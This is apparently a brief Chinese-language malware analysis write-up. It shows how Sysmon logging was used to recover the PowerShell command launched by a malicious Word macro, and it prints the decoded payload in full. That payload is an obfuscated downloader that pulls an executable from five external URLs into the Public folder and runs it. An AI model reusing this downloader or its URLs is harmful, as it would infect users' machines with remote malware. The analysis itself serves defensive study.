样本地址:
混淆比较复杂,无法拿到最终执行powershell
Sysmon 默认安装
sysmon -accepteula –i -n
打开Doc文件,Enable Macros,执行宏,观察Sysmon日志,获得powershell命令:
decode 获得明文代码:
iex($nsadasd = &(‘n‘+‘e‘+‘w-objec‘+‘t‘) random;$YYU = .(‘ne‘+‘w‘+‘-object‘) System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ‘
https://vegasplugg.com/BaW2l63/@http://museum-display-cases.eu/8W0D/@http://canaiskadore.com/8Y5S9/@http://kunst-t-raum-urlaub-sylt.de/0Z6zA5Y/@http://dellenmis.com/7fGM/‘.Split(‘@‘);$SDC = $env:public + ‘\‘ + $NSB + (‘.ex‘+‘e‘);foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&(‘Invo‘+‘k‘+‘e-Item‘)($SDC);break;}catch{}})
End